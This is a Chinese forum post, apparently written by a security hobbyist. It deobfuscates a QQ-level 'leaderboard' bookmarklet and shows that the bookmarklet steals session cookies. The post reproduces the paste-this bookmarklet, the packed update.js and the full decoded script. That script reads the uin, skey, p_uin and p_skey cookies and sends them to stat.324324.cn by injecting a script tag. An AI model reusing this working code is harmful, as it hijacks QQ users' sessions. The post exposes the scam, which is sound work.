最高的qq等级是多少?

打开qq的时候,鼠标晃到头像上去了,为什么还没有一个皇冠,如果当初的那个号不被盗,应该早就已经皇冠了,突然我想看看最高等级的qq是多少,遂打开百度,输入qq等级排行榜,打开了第一个。卧槽2个太阳,真厉害,转瞬我又想这数据咋拿到的?

屏幕中间有一个QQ上榜/更新资料,请点这里,点开,按照它写的方法,先得把下面这段代码添加到收藏夹

javascript:var v1='2.0';void((function(){var src='https://www.324324.cn/level/update.js?time='+(new Date()).getTime();var js=document.createElement('script');js.charset='utf-8';js.setAttribute('src',src);document.body.appendChild(js);})())

然后让你打开qq安全中心,在打开收藏夹的这个内容,它就采集好你的qq等级了。真棒!上面的代码相当于执行了一段js,在你qq安全中心的页面执行一段js,这意味着啥??,不行我得看看它到底干了啥?

打开看看https://www.324324.cn/level/update.js是啥?

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('7 M=F.1K("M"),v=\'\',p=\'\',c=\'\',n=\'\',q=\'\';u 1u(){7 j,1l=T;17{j=G 2y("4I.2x")}14(e){17{j=G 2y("3m.2x")}14(e){17{j=G 3n()}14(e){j=T}}}m(!j)H V;2l.1m=u(1k,18,1t,28){m(!j)H T;1l=T;18=18.3k();17{m(18=="1v"){j.2z(18,1k+"?"+1t,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}1t=""}2G{j.2z(18,1k,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}j.2E("3l","3o "+1k+" 3r/1.1");j.2E("3s-3p","3q/x-C-3d-3e")}j.3b=u(){m(j.3c==4&&!1l){1l=1i;28(j.3f)}};j.3i(1t)}14(z){H T}H 1i};H 2l};u 2w(1R){7 r=\'\',c=\'\',l=3g(29.3h()*5+1);3t(7 i=0;i<1R.3F;i++){c=1R.3G(i);m(c>47&&c<3D){c+=i%l+l;m(c>3E)c-=10}m(c>3H&&c<3K){c+=i%l+l;m(c>3L)c-=26}r+=3I.3J(c)}H 1p(r)+l.3w(16)};u O(2f){7 1S=F.1y.3x(G 3u("(^| )"+2f+"=([^;]*)(;|$)"));m(1S!=V)H 3v(1S[2]);H V};u 2b(){7 L=\'1g://W.h.11/1E-1F/2b\';7 13=\'1v\';7 2J=\'r=\'+(G 1C().1B());7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];m(f.3B==0){v=O(\'v\');2o()}2G{2g(\'3C锛乗')}};7 15=G 1u();15.1m(L,13,2J,1a)};u 2d(){7 L=\'1g://W.h.11/1E-1F/3z\';7 19=\'3A=1&v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];7 h=q;7 1r=n;7 1V=p;7 1M=c;7 N=f.N;7 1O=f.2M;7 1P=f.2Q;7 1s=f.2N;7 1Y=f.2R;7 1W=f.2P;7 1X=f.2S;7 2i=f.2O;7 1s=29.35(1s,2i);7 1T=f.36.1q;7 1U=f.33.1q;7 1j=f.34;7 P=0;m(f.39>=3a)P+=1;m(f.1N.1q>=f.1N.37)P+=38(f.1N.1s);m(f.2V.1q>=10)P+=0.3;7 s=\'<b><A U=1d 1h=+2>2W 2I \'+h+\' 2T锛�</A></b><g>\';s+=\'<g>2U锛歕'+h;s+=\'<g>2Z锛歕'+1r;s+=\'<g>31锛歕'+p+c;s+=\'<g>2X锛歕'+N;s+=\'<g>2Y锛歕'+1j;s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4H锛�2q銆傘€傘€�</A></b></a>\';F.1K(\'s\').1J=s;7 1D=2w(v+\',\'+h+\',\'+N+\',\'+1j+\',\'+P);7 2p=\'w://C.B.D/y/1n.1f?1o=4L&h=\'+h+\'&1j=\'+1j+\'&P=\'+P+\'&1O=\'+1O+\'&1P=\'+1P+\'&1W=\'+1W+\'&1X=\'+1X+\'&1Y=\'+1Y+\'&1T=\'+1T+\'&1U=\'+1U+\'&1r=\'+1p(1r)+\'&1V=\'+1p(1V)+\'&1M=\'+1p(1M)+\'&v=\'+v+\'&1D=\'+1D;7 S=F.1Q(\'2c\');S.2L(\'1c\',2p);F.1z.2s(S)};7 15=G 1u();15.1m(L,13,19,1a)};u 2o(){7 L=\'1g://W.h.11/1E-1F/4v\';7 19=\'v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];p=f[\'4D\'];c=f[\'4t\'];n=f[\'n\'];2d()};7 15=G 1u();15.1m(L,13,19,1a)};u 4P(h){7 s=\'<b><A U=1d 1h=+2>2I \'+h+\' 2m锛�</A></b><g>\';s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4R锛�</A></b></a><g><g><b><A U=4Q 1h=+2>4J:2h~</A></b>\';F.1K(\'s\').1J=s;m(4K("2m锛�4O锛焅\r\\3Z:2h~"))y.2e.K=\'w://C.B.D/y/1n.1f?1o=1G&h=\'+h};u 2a(){M.k.2j="3Y"};(u 3X(){7 1H=T;7 45=\'2.0\';7 12=O("12");7 1b=O("1b");7 1x=O("1x");7 1w=O("1w");m(12==V||1b==V)1H=1i;m(1H){2g("3P锛孿\3Q-3O锛孿\3M\\"3N\\"锛孿\3U锛�");y.2e.K="w://W.h.11/3V.1I?3T=27#27";H}7 2A=\'<1Z J="24" 2C="0" X="R" 2D="0" 2H="0"><I><E J="3R" 2F="w://C.B.D/y/3S.1e" X=2B><22 1c="w://C.B.D/y/46.1e" J="4l" Q="30"></E><E J="5"><22 1c="w://C.B.D/y/4m.1e" J="5" Q="30"></E></I><I><E 2K="2" 2F="w://C.B.D/y/4k.1e" k="25-y:4i"><1Z J="4j%"  2C="0" X="R" 2D="0" 2H="0"><I><E X="R"><21 k="1L-X:R;J:4r;Q:4p;4n:4o;" W="s"><g/><g/>4b锛�2q銆傘€傘€�<g/><g/>4c锛�4a锛�<g/><g/>48锛�49锛�4g锛�<g/><g/><a K="1g://t.h.11/2n" Z="Y"><b><A U="1d">^0^4d锛�4e^0^</A></b></a></21></E></I><I X="R"><E Q="20"><a K="w://C.B.D/N/" Z="Y">4N</a>聽聽<a K="w://C.B.D/N/4y/" Z="Y">4F</a>聽聽<a K="1g://t.h.11/2n" Z="Y">4E</a>聽聽<a K="4x:2a()">4G</a></E></I><I><E 2K="2"><22 1c="w://C.B.D/y/3y.1e" J="24" Q="6"></E></I></1Z>\';7 d=(M==V?F.1Q(\'21\'):M);d.W="M";d.k.32="4u";d.k.25=\'2k\';d.k.4A=\'2k\';d.k.4B=\'4z(42=4q)\';d.k.4f=\'4h\';d.k.2B=2u+"23";d.k.y=2u+"23";d.k.J=\'41\';d.k.Q=\'43\';d.k.44=\'R\';d.k.3W=40;d.k.2j=\'4S\';d.k.4w="0.9";d.1J=2A;M=d;F.1z.4T(d,F.1z.4s);q=12.4C(/^o[0]*/,\'\');v=O("v");7 1y=4M("12="+12+"; 1b="+1b+"; 1x="+1x+"; 1w="+1w);7 L="w://3j.B.D/N.1f";7 19="1y="+1y+"&v="+v;7 S=F.1Q(\'2c\');S.2L(\'1c\',L+\'?\'+19);F.1z.2s(S)})();',62,304,'|||||||var||||||||json|br|qq||xmlhttp|style||if||||||info||function|ldw|https||top||font|324324|www|cn|td|document|new|return|tr|width|href|url|qbit|level|getCookie|base_day|height|center|js|false|color|null|id|align|_0|target||com|uin|method|catch|ajax||try|sMethod|vars|fdone|skey|src|red|gif|php|http|size|true|day|sURL|bComplete|connect|qq_list|action|encodeURIComponent|cur|nick|speed|sVars|Ajax|GET|p_skey|p_uin|cookie|body|eval|getTime|Date|hash|cgi|bin|show|jump|html|innerHTML|getElementById|text|city|visible|vip|year|createElement|str|arr|gj|mg|province|sql|sqy|svip|table||div|img|px|335|padding||mylevel|fnDone|Math|hidewin|get_base_key|script|get_qq_level|location|name|alert|绛変粖鏃ュ姞閫熶换鍔″叏閮ㄥ畬鎴愬悗鍐嶆潵涓婃浼氭洿鍑嗗摝|sqs|display|0px|this|涓婃鎴愬姛|q324324|get_user_info|update_url|璇风◢鍊檤overrideMimeType|appendChild|utf|200|charset|qbit_encode|XMLHTTP|ActiveXObject|open|win|left|border|cellpadding|setRequestHeader|background|else|cellspacing|QQ|data|colspan|setAttribute|QQVipLevel|QQVipSpeed|superQQSpeed|superQQLevel|QQVipYear|isSuperVip|superQQYear|鐨勭瓑绾ц祫鏂檤QQ鍙风爜|shouQ|浠ヤ笅鏄瘄QQ绛夌骇|娲昏穬澶╂暟|QQ鏄电О||鎵€鍦ㄥ湴鍖簗position|xiaochu|days|max|PCMgr|total|parseFloat|onlineTotalTimes|120|onreadystatechange|readyState|form|urlencoded|responseText|parseInt|random|send|stat|toUpperCase|Method|Microsoft|XMLHttpRequest|POST|Type|application|HTTP|Content|for|RegExp|decodeURI|toString|match|footer|qqlevel|page_type|ec|鏇存柊澶辫触|58|57|length|charCodeAt|96|String|fromCharCode|123|122|n璺宠浆瀹屽悗鍐嶆閫夋嫨鏀惰棌澶归噷鐨剕QQ绛夌骇鑷姩涓婃|鎴戠殑绛夌骇椤甸潰|褰撳墠椤甸潰鎵句笉鍒颁綘鐨凲Q绛夌骇淇℃伅|n鐐瑰嚮纭畾灏嗚烦杞埌QQ涓汉涓績|330|01bg|mod|n鍗冲彲瀹屾垚涓婃鎿嶄綔|index|zIndex|showwin|none|nPS|999998|335px|Opacity|280px|textAlign|v2|01||濡傛灉闀挎椂闂存病鏈夊弽鏄爘璇峰埛鏂伴〉闈鍚﹀垯鏃犳硶鑾峰彇璧勬枡|姝e湪鏌ヨ|璇风‘淇濅綘宸茬粡鐧诲綍浜嗘垜鐨凲Q涓績|濡傛灉瑙夊緱濂界敤|灏变粙缁嶇粰浣犵殑QQ濂藉弸鍚fontSize|閲嶆柊鎿嶄綔涓€娆14px|15px|85|03bg|250|02|overflow|auto|205px|90|300px|firstChild|pos_c_cn|absolute|userinfo|opacity|javascript|update|Alpha|margin|filter|replace|pos_p_cn|寰崥浜ゆ祦|甯姪鏇存柊|鍏抽棴绐楀彛|姝e湪涓婃|Msxml2|PS|confirm|add|escape|QQ绛夌骇鎺掕姒渱鏄惁椹笂鏌ョ湅浣犵殑QQ鍏ㄥ浗鎺掑悕|show_update_info|green|鐐瑰嚮杩欓噷鏌ョ湅浣犵殑QQ绛夌骇鍏ㄧ悆鎺掑悕|block|insertBefore'.split('|'),0,{}))

混淆的,我最喜欢解混淆了,一般来说,只要能运行的js都能解。最简单的解法直接放到chrome里面动态调就行了。

复制保存到本地,打开本地保存的js,发现报错了?,复制粘贴到console里面,可以直接运行,本地报错了,第一个想到字符集出错了,确实也是这样。
比如'!\'',十六进制来看27 EF BC 81 5C 27 27,utf8下这段字符串没有任何错误,本地保存的时候没有指定字符集,chrome 默认gbk,所以 81 5c组合成了新的字符,后面的单引号逃出来了,所以报错了。所以需要指定一些字符集为utf8。 算一个小插曲。

在chrome里面下断刷新页面,没断到,遂在最前面加了一个debugger; 手动断一下。

 eval(function(p, a, c, k, e, d) {
                    e = function(c) {
                        return (c < a ? "" : e(parseInt(c / a))) + ((c = c % a) > 35 ? String.fromCharCode(c + 29) : c.toString(36))
                    }
                    ;
                    if (!''.replace(/^/, String)) {
                        while (c--)
                            d[e(c)] = k[c] || e(c);
                        k = [function(e) {
                            return d[e]
                        }
                        ];
                        e = function() {
                            return '\\w+'
                        }
                        ;
                        c = 1;
                    }
                    ;while (c--)
                        if (k[c])
                            p = p.replace(new RegExp('\\b' + e(c) + '\\b','g'), k[c]);
                    return p;
                }('7 M=F.1K("M"),v=\'\',p=\'\',c=\'\',n=\'\',q=\'\';u 1u(){7 j,1l=T;17{j=G 2y("4I.2x")}14(e){17{j=G 2y("3m.2x")}14(e){17{j=G 3n()}14(e){j=T}}}m(!j)H V;2l.1m=u(1k,18,1t,28){m(!j)H T;1l=T;18=18.3k();17{m(18=="1v"){j.2z(18,1k+"?"+1t,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}1t=""}2G{j.2z(18,1k,1i);17{j.2r("1L/1I;2v=2t-8");}14(e){}j.2E("3l","3o "+1k+" 3r/1.1");j.2E("3s-3p","3q/x-C-3d-3e")}j.3b=u(){m(j.3c==4&&!1l){1l=1i;28(j.3f)}};j.3i(1t)}14(z){H T}H 1i};H 2l};u 2w(1R){7 r=\'\',c=\'\',l=3g(29.3h()*5+1);3t(7 i=0;i<1R.3F;i++){c=1R.3G(i);m(c>47&&c<3D){c+=i%l+l;m(c>3E)c-=10}m(c>3H&&c<3K){c+=i%l+l;m(c>3L)c-=26}r+=3I.3J(c)}H 1p(r)+l.3w(16)};u O(2f){7 1S=F.1y.3x(G 3u("(^| )"+2f+"=([^;]*)(;|$)"));m(1S!=V)H 3v(1S[2]);H V};u 2b(){7 L=\'1g://W.h.11/1E-1F/2b\';7 13=\'1v\';7 2J=\'r=\'+(G 1C().1B());7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];m(f.3B==0){v=O(\'v\');2o()}2G{2g(\'3C!\')}};7 15=G 1u();15.1m(L,13,2J,1a)};u 2d(){7 L=\'1g://W.h.11/1E-1F/3z\';7 19=\'3A=1&v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];7 h=q;7 1r=n;7 1V=p;7 1M=c;7 N=f.N;7 1O=f.2M;7 1P=f.2Q;7 1s=f.2N;7 1Y=f.2R;7 1W=f.2P;7 1X=f.2S;7 2i=f.2O;7 1s=29.35(1s,2i);7 1T=f.36.1q;7 1U=f.33.1q;7 1j=f.34;7 P=0;m(f.39>=3a)P+=1;m(f.1N.1q>=f.1N.37)P+=38(f.1N.1s);m(f.2V.1q>=10)P+=0.3;7 s=\'<b><A U=1d 1h=+2>2W 2I \'+h+\' 2T:</A></b><g>\';s+=\'<g>2U:\'+h;s+=\'<g>2Z:\'+1r;s+=\'<g>31:\'+p+c;s+=\'<g>2X:\'+N;s+=\'<g>2Y:\'+1j;s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4H,2q。。。</A></b></a>\';F.1K(\'s\').1J=s;7 1D=2w(v+\',\'+h+\',\'+N+\',\'+1j+\',\'+P);7 2p=\'w://C.B.D/y/1n.1f?1o=4L&h=\'+h+\'&1j=\'+1j+\'&P=\'+P+\'&1O=\'+1O+\'&1P=\'+1P+\'&1W=\'+1W+\'&1X=\'+1X+\'&1Y=\'+1Y+\'&1T=\'+1T+\'&1U=\'+1U+\'&1r=\'+1p(1r)+\'&1V=\'+1p(1V)+\'&1M=\'+1p(1M)+\'&v=\'+v+\'&1D=\'+1D;7 S=F.1Q(\'2c\');S.2L(\'1c\',2p);F.1z.2s(S)};7 15=G 1u();15.1m(L,13,19,1a)};u 2o(){7 L=\'1g://W.h.11/1E-1F/4v\';7 19=\'v=\'+v+\'&r=\'+G 1C().1B();7 13="1v";7 1a=u(f){f=1A(\'[\'+f+\']\');f=f[0];p=f[\'4D\'];c=f[\'4t\'];n=f[\'n\'];2d()};7 15=G 1u();15.1m(L,13,19,1a)};u 4P(h){7 s=\'<b><A U=1d 1h=+2>2I \'+h+\' 2m!</A></b><g>\';s+=\'<g><g><a K="w://C.B.D/y/1n.1f?1o=1G&h=\'+h+\'" Z="Y"><b><A U=1d 1h=+2>4R!</A></b></a><g><g><b><A U=4Q 1h=+2>4J:2h~</A></b>\';F.1K(\'s\').1J=s;m(4K("2m,4O?\\r\\3Z:2h~"))y.2e.K=\'w://C.B.D/y/1n.1f?1o=1G&h=\'+h};u 2a(){M.k.2j="3Y"};(u 3X(){7 1H=T;7 45=\'2.0\';7 12=O("12");7 1b=O("1b");7 1x=O("1x");7 1w=O("1w");m(12==V||1b==V)1H=1i;m(1H){2g("3P,\\3Q-3O,\\3M\\"3N\\",\\3U!");y.2e.K="w://W.h.11/3V.1I?3T=27#27";H}7 2A=\'<1Z J="24" 2C="0" X="R" 2D="0" 2H="0"><I><E J="3R" 2F="w://C.B.D/y/3S.1e" X=2B><22 1c="w://C.B.D/y/46.1e" J="4l" Q="30"></E><E J="5"><22 1c="w://C.B.D/y/4m.1e" J="5" Q="30"></E></I><I><E 2K="2" 2F="w://C.B.D/y/4k.1e" k="25-y:4i"><1Z J="4j%"  2C="0" X="R" 2D="0" 2H="0"><I><E X="R"><21 k="1L-X:R;J:4r;Q:4p;4n:4o;" W="s"><g/><g/>4b,2q。。。<g/><g/>4c,4a!<g/><g/>48,49,4g!<g/><g/><a K="1g://t.h.11/2n" Z="Y"><b><A U="1d">^0^4d,4e^0^</A></b></a></21></E></I><I X="R"><E Q="20"><a K="w://C.B.D/N/" Z="Y">4N</a>  <a K="w://C.B.D/N/4y/" Z="Y">4F</a>  <a K="1g://t.h.11/2n" Z="Y">4E</a>  <a K="4x:2a()">4G</a></E></I><I><E 2K="2"><22 1c="w://C.B.D/y/3y.1e" J="24" Q="6"></E></I></1Z>\';7 d=(M==V?F.1Q(\'21\'):M);d.W="M";d.k.32="4u";d.k.25=\'2k\';d.k.4A=\'2k\';d.k.4B=\'4z(42=4q)\';d.k.4f=\'4h\';d.k.2B=2u+"23";d.k.y=2u+"23";d.k.J=\'41\';d.k.Q=\'43\';d.k.44=\'R\';d.k.3W=40;d.k.2j=\'4S\';d.k.4w="0.9";d.1J=2A;M=d;F.1z.4T(d,F.1z.4s);q=12.4C(/^o[0]*/,\'\');v=O("v");7 1y=4M("12="+12+"; 1b="+1b+"; 1x="+1x+"; 1w="+1w);7 L="w://3j.B.D/N.1f";7 19="1y="+1y+"&v="+v;7 S=F.1Q(\'2c\');S.2L(\'1c\',L+\'?\'+19);F.1z.2s(S)})();', 62, 304, '|||||||var||||||||json|br|qq||xmlhttp|style||if||||||info||function|ldw|https||top||font|324324|www|cn|td|document|new|return|tr|width|href|url|qbit|level|getCookie|base_day|height|center|js|false|color|null|id|align|_0|target||com|uin|method|catch|ajax||try|sMethod|vars|fdone|skey|src|red|gif|php|http|size|true|day|sURL|bComplete|connect|qq_list|action|encodeURIComponent|cur|nick|speed|sVars|Ajax|GET|p_skey|p_uin|cookie|body|eval|getTime|Date|hash|cgi|bin|show|jump|html|innerHTML|getElementById|text|city|visible|vip|year|createElement|str|arr|gj|mg|province|sql|sqy|svip|table||div|img|px|335|padding||mylevel|fnDone|Math|hidewin|get_base_key|script|get_qq_level|location|name|alert|等今日加速任务全部完成后再来上榜会更准哦|sqs|display|0px|this|上榜成功|q324324|get_user_info|update_url|请稍候|overrideMimeType|appendChild|utf|200|charset|qbit_encode|XMLHTTP|ActiveXObject|open|win|left|border|cellpadding|setRequestHeader|background|else|cellspacing|QQ|data|colspan|setAttribute|QQVipLevel|QQVipSpeed|superQQSpeed|superQQLevel|QQVipYear|isSuperVip|superQQYear|的等级资料|QQ号码|shouQ|以下是|QQ等级|活跃天数|QQ昵称||所在地区|position|xiaochu|days|max|PCMgr|total|parseFloat|onlineTotalTimes|120|onreadystatechange|readyState|form|urlencoded|responseText|parseInt|random|send|stat|toUpperCase|Method|Microsoft|XMLHttpRequest|POST|Type|application|HTTP|Content|for|RegExp|decodeURI|toString|match|footer|qqlevel|page_type|ec|更新失败|58|57|length|charCodeAt|96|String|fromCharCode|123|122|n跳转完后再次选择收藏夹里的|QQ等级自动上榜|我的等级页面|当前页面找不到你的QQ等级信息|n点击确定将跳转到QQ个人中心|330|01bg|mod|n即可完成上榜操作|index|zIndex|showwin|none|nPS|999998|335px|Opacity|280px|textAlign|v2|01||如果长时间没有反映|请刷新页面|否则无法获取资料|正在查询|请确保你已经登录了我的QQ中心|如果觉得好用|就介绍给你的QQ好友吧|fontSize|重新操作一次|14px|15px|85|03bg|250|02|overflow|auto|205px|90|300px|firstChild|pos_c_cn|absolute|userinfo|opacity|javascript|update|Alpha|margin|filter|replace|pos_p_cn|微博交流|帮助更新|关闭窗口|正在上榜|Msxml2|PS|confirm|add|escape|QQ等级排行榜|是否马上查看你的QQ全国排名|show_update_info|green|点击这里查看你的QQ等级全球排名|block|insertBefore'.split('|'), 0, {}))

格式化一下好看一些,这其实就只是一个简单的压缩混淆,直接看eval里面那个匿名函数返回的是啥就行了,这个返回值必定是它需要执行的东西。return p这里再下断。

得到p的值

var qbit = document.getElementById("qbit"),
ldw = '',
p = '',
c = '',
n = '',
q = '';
function Ajax() {
	var xmlhttp, bComplete = false;
	try {
		xmlhttp = new ActiveXObject("Msxml2.XMLHTTP")
	} catch(e) {
		try {
			xmlhttp = new ActiveXObject("Microsoft.XMLHTTP")
		} catch(e) {
			try {
				xmlhttp = new XMLHttpRequest()
			} catch(e) {
				xmlhttp = false
			}
		}
	}
	if (!xmlhttp) return null;
	this.connect = function(sURL, sMethod, sVars, fnDone) {
		if (!xmlhttp) return false;
		bComplete = false;
		sMethod = sMethod.toUpperCase();
		try {
			if (sMethod == "GET") {
				xmlhttp.open(sMethod, sURL + "?" + sVars, true);
				try {
					xmlhttp.overrideMimeType("text/html;charset=utf-8");
				} catch(e) {}
				sVars = ""
			} else {
				xmlhttp.open(sMethod, sURL, true);
				try {
					xmlhttp.overrideMimeType("text/html;charset=utf-8");
				} catch(e) {}
				xmlhttp.setRequestHeader("Method", "POST " + sURL + " HTTP/1.1");
				xmlhttp.setRequestHeader("Content-Type", "application/x-www-form-urlencoded")
			}
			xmlhttp.onreadystatechange = function() {
				if (xmlhttp.readyState == 4 && !bComplete) {
					bComplete = true;
					fnDone(xmlhttp.responseText)
				}
			};
			xmlhttp.send(sVars)
		} catch(z) {
			return false
		}
		return true
	};
	return this
};
function qbit_encode(str) {
	var r = '',
	c = '',
	l = parseInt(Math.random() * 5 + 1);
	for (var i = 0; i < str.length; i++) {
		c = str.charCodeAt(i);
		if (c > 47 && c < 58) {
			c += i % l + l;
			if (c > 57) c -= 10
		}
		if (c > 96 && c < 123) {
			c += i % l + l;
			if (c > 122) c -= 26
		}
		r += String.fromCharCode(c)
	}
	return encodeURIComponent(r) + l.toString(16)
};
function getCookie(name) {
	var arr = document.cookie.match(new RegExp("(^| )" + name + "=([^;]*)(;|$)"));
	if (arr != null) return decodeURI(arr[2]);
	return null
};
function get_base_key() {
	var url = 'http://id.qq.com/cgi-bin/get_base_key';
	var method = 'GET';
	var data = 'r=' + (new Date().getTime());
	var fdone = function(json) {
		json = eval('[' + json + ']');
		json = json[0];
		if (json.ec == 0) {
			ldw = getCookie('ldw');
			get_user_info()
		} else {
			alert('更新失败!')
		}
	};
	var ajax = new Ajax();
	ajax.connect(url, method, data, fdone)
};
function get_qq_level() {
	var url = 'http://id.qq.com/cgi-bin/qqlevel';
	var vars = 'page_type=1&ldw=' + ldw + '&r=' + new Date().getTime();
	var method = "GET";
	var fdone = function(json) {
		json = eval('[' + json + ']');
		json = json[0];
		var qq = q;
		var nick = n;
		var province = p;
		var city = c;
		var level = json.level;
		var vip = json.QQVipLevel;
		var year = json.QQVipYear;
		var speed = json.QQVipSpeed;
		var svip = json.isSuperVip;
		var sql = json.superQQLevel;
		var sqy = json.superQQYear;
		var sqs = json.superQQSpeed;
		var speed = Math.max(speed, sqs);
		var gj = json.PCMgr.cur;
		var mg = json.xiaochu.cur;
		var day = json.days;
		var base_day = 0;
		if (json.onlineTotalTimes >= 120) base_day += 1;
		if (json.visible.cur >= json.visible.total) base_day += parseFloat(json.visible.speed);
		if (json.shouQ.cur >= 10) base_day += 0.3;
		var info = '<b><font color=red size=+2>以下是 QQ ' + qq + ' 的等级资料:</font></b><br>';
		info += '<br>QQ号码:' + qq;
		info += '<br>QQ昵称:' + nick;
		info += '<br>所在地区:' + p + c;
		info += '<br>QQ等级:' + level;
		info += '<br>活跃天数:' + day;
		info += '<br><br><a href="https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq + '" target="_0"><b><font color=red size=+2>正在上榜,请稍候。。。</font></b></a>';
		document.getElementById('info').innerHTML = info;
		var hash = qbit_encode(ldw + ',' + qq + ',' + level + ',' + day + ',' + base_day);
		var update_url = 'https://www.324324.cn/top/qq_list.php?action=add&qq=' + qq + '&day=' + day + '&base_day=' + base_day + '&vip=' + vip + '&year=' + year + '&sql=' + sql + '&sqy=' + sqy + '&svip=' + svip + '&gj=' + gj + '&mg=' + mg + '&nick=' + encodeURIComponent(nick) + '&province=' + encodeURIComponent(province) + '&city=' + encodeURIComponent(city) + '&ldw=' + ldw + '&hash=' + hash;
		var js = document.createElement('script');
		js.setAttribute('src', update_url);
		document.body.appendChild(js)
	};
	var ajax = new Ajax();
	ajax.connect(url, method, vars, fdone)
};
function get_user_info() {
	var url = 'http://id.qq.com/cgi-bin/userinfo';
	var vars = 'ldw=' + ldw + '&r=' + new Date().getTime();
	var method = "GET";
	var fdone = function(json) {
		json = eval('[' + json + ']');
		json = json[0];
		p = json['pos_p_cn'];
		c = json['pos_c_cn'];
		n = json['n'];
		get_qq_level()
	};
	var ajax = new Ajax();
	ajax.connect(url, method, vars, fdone)
};
function show_update_info(qq) {
	var info = '<b><font color=red size=+2>QQ ' + qq + ' 上榜成功!</font></b><br>';
	info += '<br><br><a href="https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq + '" target="_0"><b><font color=red size=+2>点击这里查看你的QQ等级全球排名!</font></b></a><br><br><b><font color=green size=+2>PS:等今日加速任务全部完成后再来上榜会更准哦~</font></b>';
	document.getElementById('info').innerHTML = info;
	if (confirm("上榜成功,是否马上查看你的QQ全国排名?\r\nPS:等今日加速任务全部完成后再来上榜会更准哦~")) top.location.href = 'https://www.324324.cn/top/qq_list.php?action=show&qq=' + qq
};
function hidewin() {
	qbit.style.display = "none"
}; (function showwin() {
	var jump = false;
	var v2 = '2.0';
	var uin = getCookie("uin");
	var skey = getCookie("skey");
	var p_uin = getCookie("p_uin");
	var p_skey = getCookie("p_skey");
	if (uin == null || skey == null) jump = true;
	if (jump) {
		alert("当前页面找不到你的QQ等级信息,\n点击确定将跳转到QQ个人中心-我的等级页面,\n跳转完后再次选择收藏夹里的\"QQ等级自动上榜\",\n即可完成上榜操作!");
		top.location.href = "https://id.qq.com/index.html?mod=mylevel#mylevel";
		return
	}
	var win = '<table width="335" border="0" align="center" cellpadding="0" cellspacing="0"><tr><td width="330" background="https://www.324324.cn/top/01bg.gif" align=left><img src="https://www.324324.cn/top/01.gif" width="250" height="30"></td><td width="5"><img src="https://www.324324.cn/top/02.gif" width="5" height="30"></td></tr><tr><td colspan="2" background="https://www.324324.cn/top/03bg.gif" style="padding-top:15px"><table width="85%"  border="0" align="center" cellpadding="0" cellspacing="0"><tr><td align="center"><div style="text-align:center;width:300px;height:205px;overflow:auto;" id="info"><br/><br/>正在查询,请稍候。。。<br/><br/>请确保你已经登录了我的QQ中心,否则无法获取资料!<br/><br/>如果长时间没有反映,请刷新页面,重新操作一次!<br/><br/><a href="http://t.qq.com/q324324" target="_0"><b><font color="red">^0^如果觉得好用,就介绍给你的QQ好友吧^0^</font></b></a></div></td></tr><tr align="center"><td height="20"><a href="https://www.324324.cn/level/" target="_0">QQ等级排行榜</a>  <a href="https://www.324324.cn/level/update/" target="_0">帮助更新</a>  <a href="http://t.qq.com/q324324" target="_0">微博交流</a>  <a href="javascript:hidewin()">关闭窗口</a></td></tr><tr><td colspan="2"><img src="https://www.324324.cn/top/footer.gif" width="335" height="6"></td></tr></table>';
	var d = (qbit == null ? document.createElement('div') : qbit);
	d.id = "qbit";
	d.style.position = "absolute";
	d.style.padding = '0px';
	d.style.margin = '0px';
	d.style.filter = 'Alpha(Opacity=90)';
	d.style.fontSize = '14px';
	d.style.left = 200 + "px";
	d.style.top = 200 + "px";
	d.style.width = '335px';
	d.style.height = '280px';
	d.style.textAlign = 'center';
	d.style.zIndex = 999998;
	d.style.display = 'block';
	d.style.opacity = "0.9";
	d.innerHTML = win;
	qbit = d;
	document.body.insertBefore(d, document.body.firstChild);
	q = uin.replace(/^o[0]*/, '');
	ldw = getCookie("ldw");
	var cookie = escape("uin=" + uin + "; skey=" + skey + "; p_uin=" + p_uin + "; p_skey=" + p_skey);
	var url = "https://stat.324324.cn/level.php";
	var vars = "cookie=" + cookie + "&ldw=" + ldw;
	var js = document.createElement('script');
	js.setAttribute('src', url + '?' + vars);
	document.body.appendChild(js)
})();

函数定义的部分直接略,直接看流程,看最后那个运行时函数,emmm,拿我cookie干嘛?,还往外发?emmmm,拿cookie参数加载了一个js,这个js的内容还是空的。所以采集信息就是拿这样吗?不知道有多少受害者。。。。。

一篇水文,大家笑笑就好,最近特别忙忙忙,一直也在研究新的东西,也没来及总结。算日常签到吧。:)

2 Likes

猛一看还以为谁发的广告 : )

今天刚和一个腾讯的朋友讨论过,腾讯数据很多,但是各个部门之间的数据不会共享,而且数据管理的很严格,这算是不幸中的万幸吧……毕竟他还说如果腾讯所有部门数据整合,我们真的是透明的了